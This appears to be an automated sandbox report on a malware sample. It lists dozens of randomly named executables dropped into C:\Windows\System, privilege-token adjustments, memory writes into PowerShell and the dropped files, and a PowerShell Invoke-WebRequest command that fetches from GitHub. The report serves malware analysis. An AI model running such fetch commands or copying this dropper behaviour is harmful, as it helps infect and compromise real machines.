File created C:\Windows\System\ZfRuGiJ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\EDLjgvP.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GZbcCku.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\qTbMQiN.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\RIuwUDr.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WaSQnEH.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\SbhEvpc.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hPZuMJe.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kfaLwlN.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BPeppTZ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WnjQHHl.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wxCpkpj.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JpupTHE.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WpvyRsz.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vjJNtQq.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MkldbCe.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ziWJxMQ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\SUZmIfr.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KFCcvoh.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\mcCPVfS.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\OxBlfKs.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VUjdxis.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\OIxHmyV.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\TeRinFS.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\eeokekl.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\bCCnXgv.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\NzofFcZ.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\xBVryRT.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jyaZxqN.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\CMQJTCf.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\sngkMCf.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ebvSnss.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WmItKti.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\NuSDExT.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GHrvrIe.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\DqTgCCv.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
File created C:\Windows\System\fmGKzHM.exe C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3836 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3836 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3836 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\AnfHbgG.exe
PID 3836 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\AnfHbgG.exe
PID 3836 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\owsTsek.exe
PID 3836 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\owsTsek.exe
PID 3836 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\eXogIyX.exe
PID 3836 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\eXogIyX.exe
PID 3836 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\mCNwbnq.exe
PID 3836 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\mCNwbnq.exe
PID 3836 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\zoUXHGE.exe
PID 3836 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\zoUXHGE.exe
PID 3836 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\PsTqftB.exe
PID 3836 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\PsTqftB.exe
PID 3836 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\fHAoOSG.exe
PID 3836 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\fHAoOSG.exe
PID 3836 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\LfHGfqB.exe
PID 3836 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\LfHGfqB.exe
PID 3836 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\JgTbNdc.exe
PID 3836 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\JgTbNdc.exe
PID 3836 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\EtFmAcE.exe
PID 3836 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\EtFmAcE.exe
PID 3836 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GujXmeB.exe
PID 3836 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GujXmeB.exe
PID 3836 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\QoMimGa.exe
PID 3836 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\QoMimGa.exe
PID 3836 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\pCPQzdl.exe
PID 3836 wrote to memory of 3656 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\pCPQzdl.exe
PID 3836 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\wxCpkpj.exe
PID 3836 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\wxCpkpj.exe
PID 3836 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GQckUAj.exe
PID 3836 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\GQckUAj.exe
PID 3836 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\FfrtHjS.exe
PID 3836 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\FfrtHjS.exe
PID 3836 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\CeemIxU.exe
PID 3836 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\CeemIxU.exe
PID 3836 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\twBhife.exe
PID 3836 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\twBhife.exe
PID 3836 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\sXmCKGJ.exe
PID 3836 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\sXmCKGJ.exe
PID 3836 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\BxqKKjn.exe
PID 3836 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\BxqKKjn.exe
PID 3836 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\iDYIyrC.exe
PID 3836 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\iDYIyrC.exe
PID 3836 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\lkrNRcv.exe
PID 3836 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\lkrNRcv.exe
PID 3836 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\MbcGyDC.exe
PID 3836 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\MbcGyDC.exe
PID 3836 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\HUagQUk.exe
PID 3836 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\HUagQUk.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\NdEjRIZ.exe
PID 3836 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\NdEjRIZ.exe
PID 3836 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\wPEjBHG.exe
PID 3836 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\wPEjBHG.exe
PID 3836 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\Ylydjqo.exe
PID 3836 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\Ylydjqo.exe
PID 3836 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\FgPswQg.exe
PID 3836 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\FgPswQg.exe
PID 3836 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\yrmfvbe.exe
PID 3836 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\yrmfvbe.exe
PID 3836 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\yMEECiQ.exe
PID 3836 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\yMEECiQ.exe
PID 3836 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\UjIBrcH.exe
PID 3836 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe C:\Windows\System\UjIBrcH.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3e9631f7229f312d36bb6c94688a3d80_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\AnfHbgG.exe

C:\Windows\System\AnfHbgG.exe

C:\Windows\System\owsTsek.exe

C:\Windows\System\owsTsek.exe

C:\Windows\System\eXogIyX.exe

C:\Windows\System\eXogIyX.exe

C:\Windows\System\mCNwbnq.exe

C:\Windows\System\mCNwbnq.exe

C:\Windows\System\zoUXHGE.exe

C:\Windows\System\zoUXHGE.exe

C:\Windows\System\PsTqftB.exe

C:\Windows\System\PsTqftB.exe

C:\Windows\System\fHAoOSG.exe

C:\Windows\System\fHAoOSG.exe

C:\Windows\System\LfHGfqB.exe

C:\Windows\System\LfHGfqB.exe

C:\Windows\System\JgTbNdc.exe

C:\Windows\System\JgTbNdc.exe

C:\Windows\System\EtFmAcE.exe

C:\Windows\System\EtFmAcE.exe

C:\Windows\System\GujXmeB.exe

C:\Windows\System\GujXmeB.exe

C:\Windows\System\QoMimGa.exe

C:\Windows\System\QoMimGa.exe

C:\Windows\System\pCPQzdl.exe

C:\Windows\System\pCPQzdl.exe

C:\Windows\System\wxCpkpj.exe

C:\Windows\System\wxCpkpj.exe

C:\Windows\System\GQckUAj.exe

C:\Windows\System\GQckUAj.exe

C:\Windows\System\FfrtHjS.exe

C:\Windows\System\FfrtHjS.exe

C:\Windows\System\CeemIxU.exe

C:\Windows\System\CeemIxU.exe

C:\Windows\System\twBhife.exe

C:\Windows\System\twBhife.exe

C:\Windows\System\sXmCKGJ.exe

C:\Windows\System\sXmCKGJ.exe

C:\Windows\System\BxqKKjn.exe

C:\Windows\System\BxqKKjn.exe

C:\Windows\System\iDYIyrC.exe

C:\Windows\System\iDYIyrC.exe

C:\Windows\System\lkrNRcv.exe

C:\Windows\System\lkrNRcv.exe

C:\Windows\System\MbcGyDC.exe

C:\Windows\System\MbcGyDC.exe

C:\Windows\System\HUagQUk.exe

C:\Windows\System\HUagQUk.exe

C:\Windows\System\NdEjRIZ.exe

C:\Windows\System\NdEjRIZ.exe

C:\Windows\System\wPEjBHG.exe

C:\Windows\System\wPEjBHG.exe

C:\Windows\System\Ylydjqo.exe

C:\Windows\System\Ylydjqo.exe

C:\Windows\System\FgPswQg.exe

C:\Windows\System\FgPswQg.exe

C:\Windows\System\yrmfvbe.exe

C:\Windows\System\yrmfvbe.exe

C:\Windows\System\yMEECiQ.exe

C:\Windows\System\yMEECiQ.exe

C:\Windows\System\UjIBrcH.exe

C:\Windows\System\UjIBrcH.exe

C:\Windows\System\JGnUHnm.exe

C:\Windows\System\JGnUHnm.exe

C:\Windows\System\sjWpTAq.exe

C:\Windows\System\sjWpTAq.exe

C:\Windows\System\xDaBvJd.exe

C:\Windows\System\xDaBvJd.exe

C:\Windows\System\rRfBZuB.exe

C:\Windows\System\rRfBZuB.exe

C:\Windows\System\YYDrhEA.exe

C:\Windows\System\YYDrhEA.exe

C:\Windows\System\bsujjfH.exe

C:\Windows\System\bsujjfH.exe

C:\Windows\System\CQjGAsF.exe

C:\Windows\System\CQjGAsF.exe

C:\Windows\System\eUPoQiD.exe

C:\Windows\System\eUPoQiD.exe

C:\Windows\System\ccFKPOh.exe

C:\Windows\System\ccFKPOh.exe

C:\Windows\System\hDBPigV.exe

C:\Windows\System\hDBPigV.exe

C:\Windows\System\VzLcBEM.exe

C:\Windows\System\VzLcBEM.exe

C:\Windows\System\UzlVdGz.exe

C:\Windows\System\UzlVdGz.exe

C:\Windows\System\KOXCViW.exe

C:\Windows\System\KOXCViW.exe

C:\Windows\System\yYftVVC.exe

C:\Windows\System\yYftVVC.exe

C:\Windows\System\ZTOLzJI.exe

C:\Windows\System\ZTOLzJI.exe

C:\Windows\System\gCrppZa.exe

C:\Windows\System\gCrppZa.exe

C:\Windows\System\AAgDeVs.exe

C:\Windows\System\AAgDeVs.exe

C:\Windows\System\kAGLSmM.exe

C:\Windows\System\kAGLSmM.exe

C:\Windows\System\JFSYXbF.exe

C:\Windows\System\JFSYXbF.exe

C:\Windows\System\VHOFmHS.exe

C:\Windows\System\VHOFmHS.exe

C:\Windows\System\ayreXaa.exe

C:\Windows\System\ayreXaa.exe

C:\Windows\System\JQbBOgN.exe

C:\Windows\System\JQbBOgN.exe

C:\Windows\System\TipIUwj.exe

C:\Windows\System\TipIUwj.exe

C:\Windows\System\nfrOFFx.exe

C:\Windows\System\nfrOFFx.exe

C:\Windows\System\KqAsbVL.exe

C:\Windows\System\KqAsbVL.exe

C:\Windows\System\YNMJoSy.exe

C:\Windows\System\YNMJoSy.exe

C:\Windows\System\MszExGN.exe

C:\Windows\System\MszExGN.exe

C:\Windows\System\wGlbRCV.exe

C:\Windows\System\wGlbRCV.exe

C:\Windows\System\NKdSxoQ.exe

C:\Windows\System\NKdSxoQ.exe

C:\Windows\System\ZbzMgRZ.exe

C:\Windows\System\ZbzMgRZ.exe

C:\Windows\System\MRpCmAM.exe

C:\Windows\System\MRpCmAM.exe

C:\Windows\System\oDFNSCe.exe

C:\Windows\System\oDFNSCe.exe

C:\Windows\System\yohaepY.exe

C:\Windows\System\yohaepY.exe

C:\Windows\System\FEZacsb.exe

C:\Windows\System\FEZacsb.exe

C:\Windows\System\vuMdHrX.exe

C:\Windows\System\vuMdHrX.exe

C:\Windows\System\uaIYgAf.exe

C:\Windows\System\uaIYgAf.exe

C:\Windows\System\WHeBlVS.exe

C:\Windows\System\WHeBlVS.exe

C:\Windows\System\TccFLGT.exe

C:\Windows\System\TccFLGT.exe

C:\Windows\System\PJLqnix.exe

C:\Windows\System\PJLqnix.exe

C:\Windows\System\xBVryRT.exe

C:\Windows\System\xBVryRT.exe

C:\Windows\System\EzWVTut.exe

C:\Windows\System\EzWVTut.exe

C:\Windows\System\QYkQRzf.exe

C:\Windows\System\QYkQRzf.exe

C:\Windows\System\JxngQjm.exe

C:\Windows\System\JxngQjm.exe

C:\Windows\System\CPTBmpC.exe

C:\Windows\System\CPTBmpC.exe

C:\Windows\System\MgJcoOl.exe

C:\Windows\System\MgJcoOl.exe

C:\Windows\System\MaIEuII.exe

C:\Windows\System\MaIEuII.exe

C:\Windows\System\IPsCEqb.exe

C:\Windows\System\IPsCEqb.exe

C:\Windows\System\MLVjhsP.exe

C:\Windows\System\MLVjhsP.exe

C:\Windows\System\savBtvh.exe

C:\Windows\System\savBtvh.exe

C:\Windows\System\xqNikhP.exe

C:\Windows\System\xqNikhP.exe

C:\Windows\System\PrPbsHO.exe

C:\Windows\System\PrPbsHO.exe

C:\Windows\System\lFCHXtS.exe

C:\Windows\System\lFCHXtS.exe

C:\Windows\System\qPCKIHn.exe

C:\Windows\System\qPCKIHn.exe

C:\Windows\System\jGExwlu.exe

C:\Windows\System\jGExwlu.exe

C:\Windows\System\rbIVvdd.exe

C:\Windows\System\rbIVvdd.exe

C:\Windows\System\xMjbKgJ.exe

C:\Windows\System\xMjbKgJ.exe

C:\Windows\System\DomerIi.exe

C:\Windows\System\DomerIi.exe

C:\Windows\System\rRgVELe.exe

C:\Windows\System\rRgVELe.exe

C:\Windows\System\QJpBdus.exe

C:\Windows\System\QJpBdus.exe

C:\Windows\System\LkgEadE.exe

C:\Windows\System\LkgEadE.exe

C:\Windows\System\cXPwJWa.exe

C:\Windows\System\cXPwJWa.exe

C:\Windows\System\jZCGULU.exe

C:\Windows\System\jZCGULU.exe

C:\Windows\System\iiBiOBj.exe

C:\Windows\System\iiBiOBj.exe

C:\Windows\System\UkPlqUN.exe

C:\Windows\System\UkPlqUN.exe

C:\Windows\System\RBfmWwW.exe

C:\Windows\System\RBfmWwW.exe

C:\Windows\System\PrwnLrF.exe

C:\Windows\System\PrwnLrF.exe

C:\Windows\System\XIQAYbK.exe

C:\Windows\System\XIQAYbK.exe

C:\Windows\System\GERFMBT.exe

C:\Windows\System\GERFMBT.exe

C:\Windows\System\OIxHmyV.exe

C:\Windows\System\OIxHmyV.exe

C:\Windows\System\kWRrFam.exe

C:\Windows\System\kWRrFam.exe

C:\Windows\System\ALgMjwu.exe

C:\Windows\System\ALgMjwu.exe

C:\Windows\System\cWFVdbb.exe

C:\Windows\System\cWFVdbb.exe

C:\Windows\System\wLtBzfX.exe

C:\Windows\System\wLtBzfX.exe

C:\Windows\System\YwVJSuG.exe

C:\Windows\System\YwVJSuG.exe

C:\Windows\System\zckvTZD.exe

C:\Windows\System\zckvTZD.exe

C:\Windows\System\cGUeGkl.exe

C:\Windows\System\cGUeGkl.exe

C:\Windows\System\ebvSnss.exe

C:\Windows\System\ebvSnss.exe

C:\Windows\System\LMORMOg.exe

C:\Windows\System\LMORMOg.exe

C:\Windows\System\pWDRUoQ.exe

C:\Windows\System\pWDRUoQ.exe

C:\Windows\System\bsxbsYH.exe

C:\Windows\System\bsxbsYH.exe

C:\Windows\System\PtjOGfk.exe

C:\Windows\System\PtjOGfk.exe

C:\Windows\System\hvhuxuc.exe

C:\Windows\System\hvhuxuc.exe

C:\Windows\System\tLmtMLL.exe

C:\Windows\System\tLmtMLL.exe

C:\Windows\System\YdMhPrx.exe

C:\Windows\System\YdMhPrx.exe

C:\Windows\System\wnPsYDK.exe

C:\Windows\System\wnPsYDK.exe

C:\Windows\System\ANrXOFJ.exe

C:\Windows\System\ANrXOFJ.exe

C:\Windows\System\armHxQa.exe

C:\Windows\System\armHxQa.exe

C:\Windows\System\cAYECAv.exe

C:\Windows\System\cAYECAv.exe

C:\Windows\System\RKOXJdL.exe

C:\Windows\System\RKOXJdL.exe

C:\Windows\System\aVecYaq.exe

C:\Windows\System\aVecYaq.exe

C:\Windows\System\VITbXLz.exe

C:\Windows\System\VITbXLz.exe

C:\Windows\System\EiyTyMW.exe

C:\Windows\System\EiyTyMW.exe

C:\Windows\System\QqHvHHt.exe

C:\Windows\System\QqHvHHt.exe

C:\Windows\System\FQLnNlN.exe

C:\Windows\System\FQLnNlN.exe

C:\Windows\System\PXwVHlz.exe

C:\Windows\System\PXwVHlz.exe

C:\Windows\System\hnhsLep.exe

C:\Windows\System\hnhsLep.exe

C:\Windows\System\vBxmnZZ.exe

C:\Windows\System\vBxmnZZ.exe

C:\Windows\System\yTbPgGP.exe

C:\Windows\System\yTbPgGP.exe

C:\Windows\System\cTPAgpW.exe

C:\Windows\System\cTPAgpW.exe

C:\Windows\System\YFjsvUw.exe

C:\Windows\System\YFjsvUw.exe

C:\Windows\System\fqDNcWo.exe

C:\Windows\System\fqDNcWo.exe

C:\Windows\System\JmOrHrK.exe

C:\Windows\System\JmOrHrK.exe

C:\Windows\System\WawvQlw.exe

C:\Windows\System\WawvQlw.exe

C:\Windows\System\TsGhwUm.exe

C:\Windows\System\TsGhwUm.exe

C:\Windows\System\bKzZqMt.exe

C:\Windows\System\bKzZqMt.exe

C:\Windows\System\Wuajark.exe

C:\Windows\System\Wuajark.exe

C:\Windows\System\IQLeQKd.exe

C:\Windows\System\IQLeQKd.exe

C:\Windows\System\TQpcoBA.exe

C:\Windows\System\TQpcoBA.exe

C:\Windows\System\sNYxHYO.exe

C:\Windows\System\sNYxHYO.exe

